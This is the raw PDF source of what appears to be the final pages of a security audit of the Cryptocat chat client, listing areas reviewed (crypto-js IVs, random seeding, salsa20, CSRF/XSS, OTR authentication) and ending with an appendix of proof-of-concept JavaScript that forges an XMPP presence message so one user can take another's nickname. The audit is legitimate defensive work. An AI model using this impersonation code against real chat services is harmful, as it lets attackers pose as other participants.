-3 cm q BT 1 0 0 1 0 26 Tm 1.819398 Tw 12 TL /F1 10 Tf 0 0 0 rg (Note: We have a concern about a potential security failure if ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (is the wrong type, size, or) Tj T* 0 Tw 1.72816 Tw (element type/range when using counter mode in this dependency. We analyzed ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf ('s) Tj T* 0 Tw (current call sites and believe it uses ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (s of the correct type and size.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 456.0236 cm Q q 1 0 0 1 62.69291 390.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 51 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 27 cm q BT 1 0 0 1 0 26 Tm 1.06998 Tw 12 TL /F1 10 Tf 0 0 0 rg (We investigated a concerning counter rollover behavior in ) Tj /F4 10 Tf (crypto-js ) Tj /F1 10 Tf (and verified that ) Tj /F3 10 Tf (Cryptocat) Tj T* 0 Tw .486651 Tw /F1 10 Tf (currently will never cause this rollover in file-transfer encryption. However, this is a danger for future) Tj T* 0 Tw (development.) Tj T* ET Q Q q 1 0 0 1 23 21 cm Q q 1 0 0 1 23 21 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .509985 Tw 12 TL /F1 10 Tf 0 0 0 rg (The restriction on file transfer ) Tj /F3 10 Tf (MIME ) Tj /F1 10 Tf (type is described in the UI but not documented or justified) Tj T* 0 Tw (in the ) Tj 0 0 .501961 rg (Wiki Specification of File Transfer) Tj 0 0 0 rg (.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 390.0236 cm Q q 1 0 0 1 62.69291 372.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (We investigated the entire source and use of ) Tj /F4 10 Tf (etc/random.js) Tj /F1 10 Tf (:) Tj T* ET Q Q q 1 0 0 1 62.69291 366.0236 cm Q q 1 0 0 1 62.69291 366.0236 cm Q q 1 0 0 1 62.69291 342.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 5.494418 Tw 12 TL /F1 10 Tf 0 0 0 rg (Examined how seeds are distributed to web workers: ) Tj /F4 10 Tf (workers/keyGenerator.js ) Tj /F1 10 Tf (and) Tj T* 0 Tw /F4 10 Tf (workers/smp.js) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 336.0236 cm Q q 1 0 0 1 62.69291 288.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL 1.112651 Tw (We examined the API and call sites to gain assurance that there are not insufficient-entropy flaws) Tj T* 0 Tw 1.52686 Tw (due to buffer encodings as have been discovered in the past. The new API makes the encoding) Tj T* 0 Tw 1.543059 Tw (much more explicit using explicitly-named encodings. We believe the correct encoding is used at) Tj T* 0 Tw (each call site, so we have confidence this kind of flaw is not present in the current codebase.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 288.0236 cm Q q 1 0 0 1 62.69291 234.0236 cm q BT 1 0 0 1 0 38 Tm .49784 Tw 12 TL /F1 10 Tf 0 0 0 rg (We also briefly skimmed the complete source to ) Tj /F4 10 Tf (lib/salsa20.js ) Tj /F1 10 Tf (to identify any glaring problems, but) Tj T* 0 Tw 2.439269 Tw (saw none. We did not thoroughly verify the implementation correctness, such as by comparing test) Tj T* 0 Tw 1.60229 Tw (vectors against other implementations, nor did we analyze side-channel issues which may leak secret) Tj T* 0 Tw (state.) Tj T* ET Q Q q 1 0 0 1 62.69291 204.0236 cm q BT 1 0 0 1 0 14 Tm .964524 Tw 12 TL /F1 10 Tf 0 0 0 rg (We examined portions of ) Tj /F4 10 Tf (lib/strophe/ ) Tj /F1 10 Tf (relevant to understanding interactions between ) Tj /F3 10 Tf (XMPP) Tj /F1 10 Tf (, ) Tj /F3 10 Tf (OTR) Tj /F1 10 Tf (,) Tj T* 0 Tw (and ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (data structures and event interleaving.) Tj T* ET Q Q q 1 0 0 1 62.69291 186.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (We did minimal analysis on the potential for ) Tj /F3 10 Tf (XSS ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (CSRF ) Tj /F1 10 Tf (vulnerabilities:) Tj T* ET Q Q q 1 0 0 1 62.69291 180.0236 cm Q q 1 0 0 1 62.69291 180.0236 cm Q q 1 0 0 1 62.69291 120.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm 2.903059 Tw 12 TL /F1 10 Tf 0 0 0 rg (We believe ) Tj /F3 10 Tf (BOSH ) Tj /F1 10 Tf (is resistant to ) Tj /F3 10 Tf (CSRF ) Tj /F1 10 Tf (attacks provided the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (parameter is unguessable.) Tj T* 0 Tw .985984 Tw (Viewing requests and responses in the browser's developer tools suggests this is true. We did not) Tj T* 0 Tw 1.529985 Tw (analyze if participants in a group chat can learn sufficient details to create a ) Tj /F3 10 Tf (CSRF ) Tj /F1 10 Tf (attack vector) Tj T* 0 Tw .316235 Tw (against other users. $Also, if this were a problem, it would be common to all ) Tj /F3 10 Tf (BOSH ) Tj /F1 10 Tf (implementations.) Tj T* 0 Tw (We have not yet investigated if this is a commonly known issue.$) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 114.0236 cm Q q 1 0 0 1 62.69291 78.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm .099986 Tw 12 TL /F1 10 Tf 0 0 0 rg (We performed only a few ) Tj /F3 10 Tf (XSS ) Tj /F1 10 Tf (tests, such as injections in the username or chat contents. The former) Tj T* 0 Tw .516905 Tw (is inconclusive because we did not bypass client-based input-side restrictions that a malicious client) Tj T* 0 Tw (could bypass, and the latter was unsuccessful.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 76.86614 cm Q endstream endobj % 'R203': class PDFStream 203 0 obj % page stream << /Length 2867 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 753.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Our investigation into these kinds of web-frontend attacks was not very thorough.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 753.0236 cm Q q 1 0 0 1 62.69291 735.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (We did investigate ) Tj /F4 10 Tf (lib/bigint.js) Tj /F1 10 Tf (:) Tj T* ET Q Q q 1 0 0 1 62.69291 729.0236 cm Q q 1 0 0 1 62.69291 729.0236 cm Q q 1 0 0 1 62.69291 717.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Found and filed a performance bug which we do not believe is security relevant, ) Tj 0 0 .501961 rg (OTR Issue 41) Tj 0 0 0 rg (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 711.0236 cm Q q 1 0 0 1 62.69291 699.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Examined implementation of Maurer's algorithm before realizing it is unexercised in ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 699.0236 cm Q q 1 0 0 1 62.69291 657.0236 cm q BT 1 0 0 1 0 26 Tm .894147 Tw 12 TL /F1 10 Tf 0 0 0 rg (We investigated the potential for cross-site ) Tj /F4 10 Tf (postMessage ) Tj /F1 10 Tf (abuse against the web workers; however,) Tj T* 0 Tw .652126 Tw (they are anonymous web workers, and thus protected against this attack vector by ) Tj /F3 10 Tf (JavaScript ) Tj /F1 10 Tf (referential) Tj T* 0 Tw (semantics.) Tj T* ET Q Q q 1 0 0 1 62.69291 639.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Investigated authentication, mainly in one-to-one ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (chat:) Tj T* ET Q Q q 1 0 0 1 62.69291 633.0236 cm Q q 1 0 0 1 62.69291 633.0236 cm Q q 1 0 0 1 62.69291 621.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Filed ) Tj /F3 10 Tf (Issue 506 ) Tj /F1 10 Tf (about a dubious time-based retry loop for sending public keys.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 621.0236 cm Q q 1 0 0 1 62.69291 603.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Experimented with nickname reuse between clients at different times in the same channel.) Tj T* ET Q Q q 1 0 0 1 62.69291 603.0236 cm Q endstream endobj % 'R204': class PDFStream 204 0 obj % page stream << /Length 1900 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix C: Exploit Code for Issue G) Tj T* ET Q Q q 1 0 0 1 62.69291 726.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (The following code, triggered on connection to the server, was used to verify Issue G:) Tj T* ET Q Q q 1 0 0 1 62.69291 443.5142 cm q q .814085 0 0 .814085 0 0 cm q 1 0 0 1 6.6 8.107263 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 576 336 re B* Q q 0 0 0 rg BT 1 0 0 1 0 314 Tm /F4 10 Tf 12 TL (if $Cryptocat.myNickname == 'mallory'$ {) Tj T* ( try {) Tj T* ( var delay = 30;) Tj T* ( var newNickname = 'bob';) Tj T* T* ( console.log$'Hacking commences in ' + delay + 's'$;) Tj T* T* ( // Cryptocat.xmpp.connection.muc on trunk) Tj T* ( var muc = Cryptocat.connection.muc;) Tj T* ( // Cryptocat.xmpp.conferenceServer on trunk) Tj T* ( var roomPrefix = Cryptocat.conversationName + '@' + Cryptocat.conferenceServer + '/';) Tj T* T* ( var fromJID = muc._connection.jid;) Tj T* ( var presence = new Strophe.Builder$'presence', {to: roomPrefix + Cryptocat.myNickname,) Tj T* ( from: fromJID}$) Tj T* ( .c$'status', {code: '303'}$.up) Tj T* ( .c$'item', {nick: newNickname}$.tree;) Tj T* ( console.log$presence$;) Tj T* ( window.setTimeout$function\($ {) Tj T* ( console.log$'Sending the presence message:', presence$;) Tj T* ( muc._connection.send$presence$;) Tj T* ( console.log$'Sent it'$;) Tj T* ( }, delay*1000\);) Tj T* ( } catch$e$ {) Tj T* ( console.log$e, e.stack$;) Tj T* ( }) Tj T* (}) Tj T* ET Q Q Q Q Q endstream endobj % 'R205': class PDFPageLabels 205 0 obj % Document Root << /Nums [ 0 206 0 R 1 207 0 R 2 208 0 R 3 209 0 R 4 210 0 R 5 211 0 R 6 212 0 R 7 213 0 R 8 214 0 R 9 215 0 R 10 216 0 R 11 217 0 R 12 218 0 R 13 219 0 R 14 220 0 R 15 221 0 R 16 222 0 R 17 223 0 R 18 224 0 R 19 225 0 R 20 226 0 R 21 227 0 R 22 228 0 R 23 229 0 R 24 230 0 R 25 231 0 R 26 232 0 R ] >> endobj % 'R206': class PDFPageLabel 206 0 obj % None << /S /D /St 1 >> endobj % 'R207': class PDFPageLabel 207 0 obj % None << /S /D /St 2 >> endobj % 'R208': class PDFPageLabel 208 0 obj % None << /S /D /St 3 >> endobj % 'R209': class PDFPageLabel 209 0 obj % None << /S /D /St 4 >> endobj % 'R210': class PDFPageLabel 210 0 obj % None << /S /D /St 5 >> endobj % 'R211': class PDFPageLabel 211 0 obj % None << /S /D /St 6 >> endobj % 'R212': class PDFPageLabel 212 0 obj % None << /S /D /St 7 >> endobj % 'R213': class PDFPageLabel 213 0 obj % None << /S /D /St 8 >> endobj % 'R214': class PDFPageLabel 214 0 obj % None << /S /D /St 9 >> endobj % 'R215': class PDFPageLabel 215 0 obj % None << /S /D /St 10 >> endobj % 'R216': class PDFPageLabel 216 0 obj % None << /S /D /St 11 >> endobj % 'R217': class PDFPageLabel 217 0 obj % None << /S /D /St 12 >> endobj % 'R218': class PDFPageLabel 218 0 obj % None << /S /D /St 13 >> endobj % 'R219': class PDFPageLabel 219 0 obj % None << /S /D /St 14 >> endobj % 'R220': class PDFPageLabel 220 0 obj % None << /S /D /St 15 >> endobj % 'R221': class PDFPageLabel 221 0 obj % None << /S /D /St 16 >> endobj % 'R222': class PDFPageLabel 222 0 obj % None << /S /D /St 17 >> endobj % 'R223': class PDFPageLabel 223 0 obj % None << /S /D /St 18 >> endobj % 'R224': class PDFPageLabel 224 0 obj % None << /S /D /St 19 >> endobj % 'R225': class PDFPageLabel 225 0 obj % None << /S /D /St 20 >> endobj % 'R226': class PDFPageLabel 226 0 obj % None << /S /D /St 21 >> endobj % 'R227': class PDFPageLabel 227 0 obj % None << /S /D /St 22 >> endobj % 'R228': class PDFPageLabel 228 0 obj % None << /S /D /St 23 >> endobj % 'R229': class PDFPageLabel 229 0 obj % None << /S /D /St 24 >> endobj % 'R230': class PDFPageLabel 230 0 obj % None << /S /D /St 25 >> endobj % 'R231': class PDFPageLabel 231 0 obj % None << /S /D /St 26 >> endobj % 'R232': class PDFPageLabel 232 0 obj % None << /S /D /St 27 >> endobj xref 0 233 0000000000 65535 f 0000000113 00000 n 0000000286 00000 n 0000000451 00000 n 0000000638 00000 n 0000000888 00000 n 0000001137 00000 n 0000001386 00000 n 0000001622 00000 n 0000001962 00000 n 0000002203 00000 n 0000002445 00000 n 0000002687 00000 n 0000002929 00000 n 0000003172 00000 n 0000003415 00000 n 0000003658 00000 n 0000003901 00000 n 0000004144 00000 n 0000004387 00000 n 0000004630 00000 n 0000004873 00000 n 0000005116 00000 n 0000005359 00000 n 0000005602 00000 n 0000005845 00000 n 0000006088 00000 n 0000006331 00000 n 0000006574 00000 n 0000006817 00000 n 0000007060 00000 n 0000007303 00000 n 0000007546 00000 n 0000007789 00000 n 0000008032 00000 n 0000008275 00000 n 0000008518 00000 n 0000008761 00000 n 0000009004 00000 n 0000009247 00000 n 0000009490 00000 n 0000009734 00000 n 0000009978 00000 n 0000010222 00000 n 0000010466 00000 n 0000010710 00000 n 0000010954 00000 n 0000011198 00000 n 0000011442 00000 n 0000011686 00000 n 0000011930 00000 n 0000012174 00000 n 0000012418 00000 n 0000012662 00000 n 0000012906 00000 n 0000013150 00000 n 0000013394 00000 n 0000013638 00000 n 0000013882 00000 n 0000014126 00000 n 0000014370 00000 n 0000014614 00000 n 0000014858 00000 n 0000015102 00000 n 0000015346 00000 n 0000015590 00000 n 0000015834 00000 n 0000016078 00000 n 0000016322 00000 n 0000016566 00000 n 0000016810 00000 n 0000017054 00000 n 0000017297 00000 n 0000017543 00000 n 0000017769 00000 n 0000017964 00000 n 0000018213 00000 n 0000018437 00000 n 0000019335 00000 n 0000019511 00000 n 0000019755 00000 n 0000019985 00000 n 0000020173 00000 n 0000020485 00000 n 0000020782 00000 n 0000021039 00000 n 0000021342 00000 n 0000021626 00000 n 0000021783 00000 n 0000022080 00000 n 0000022320 00000 n 0000022623 00000 n 0000022920 00000 n 0000023175 00000 n 0000023473 00000 n 0000023725 00000 n 0000024061 00000 n 0000024307 00000 n 0000024478 00000 n 0000024782 00000 n 0000025079 00000 n 0000025379 00000 n 0000025665 00000 n 0000025981 00000 n 0000026280 00000 n 0000026525 00000 n 0000026755 00000 n 0000027086 00000 n 0000027331 00000 n 0000027561 00000 n 0000027877 00000 n 0000028176 00000 n 0000028419 00000 n 0000028662 00000 n 0000028918 00000 n 0000029258 00000 n 0000029591 00000 n 0000029897 00000 n 0000030165 00000 n 0000030409 00000 n 0000030653 00000 n 0000030883 00000 n 0000031254 00000 n 0000031499 00000 n 0000031729 00000 n 0000032060 00000 n 0000032304 00000 n 0000032548 00000 n 0000032793 00000 n 0000033038 00000 n 0000033283 00000 n 0000033528 00000 n 0000033773 00000 n 0000034002 00000 n 0000034378 00000 n 0000034662 00000 n 0000034946 00000 n 0000035245 00000 n 0000035516 00000 n 0000035808 00000 n 0000036139 00000 n 0000036386 00000 n 0000036692 00000 n 0000036977 00000 n 0000037141 00000 n 0000037428 00000 n 0000037557 00000 n 0000037776 00000 n 0000037954 00000 n 0000038173 00000 n 0000038345 00000 n 0000038581 00000 n 0000038812 00000 n 0000039047 00000 n 0000039259 00000 n 0000039516 00000 n 0000039693 00000 n 0000039898 00000 n 0000040100 00000 n 0000040358 00000 n 0000040600 00000 n 0000040884 00000 n 0000041114 00000 n 0000041350 00000 n 0000041591 00000 n 0000041757 00000 n 0000041996 00000 n 0000042253 00000 n 0000042436 00000 n 0000042633 00000 n 0000042846 00000 n 0000043037 00000 n 0000043227 00000 n 0000043470 00000 n 0000043635 00000 n 0000043873 00000 n 0000044074 00000 n 0000044260 00000 n 0000044619 00000 n 0000046828 00000 n 0000056036 00000 n 0000061773 00000 n 0000070800 00000 n 0000074399 00000 n 0000081073 00000 n 0000089074 00000 n 0000093405 00000 n 0000101555 00000 n 0000105042 00000 n 0000113542 00000 n 0000121023 00000 n 0000124261 00000 n 0000127261 00000 n 0000134742 00000 n 0000138700 00000 n 0000140208 00000 n 0000146879 00000 n 0000157966 00000 n 0000165268 00000 n 0000174723 00000 n 0000184425 00000 n 0000194846 00000 n 0000198568 00000 n 0000208746 00000 n 0000211714 00000 n 0000213719 00000 n 0000214196 00000 n 0000214275 00000 n 0000214354 00000 n 0000214433 00000 n 0000214512 00000 n 0000214591 00000 n 0000214670 00000 n 0000214749 00000 n 0000214828 00000 n 0000214907 00000 n 0000214987 00000 n 0000215067 00000 n 0000215147 00000 n 0000215227 00000 n 0000215307 00000 n 0000215387 00000 n 0000215467 00000 n 0000215547 00000 n 0000215627 00000 n 0000215707 00000 n 0000215787 00000 n 0000215867 00000 n 0000215947 00000 n 0000216027 00000 n 0000216107 00000 n 0000216187 00000 n 0000216267 00000 n trailer << /ID % ReportLab generated PDF document -- digest (http://www.reportlab.com) [(\200\022?\027&Ku\304\327P\032\034D\343\317\200) (\200\022?\027&Ku\304\327P\032\034D\343\317\200)] /Info 144 0 R /Root 143 0 R /Size 233 >> startxref 216316 %%EOF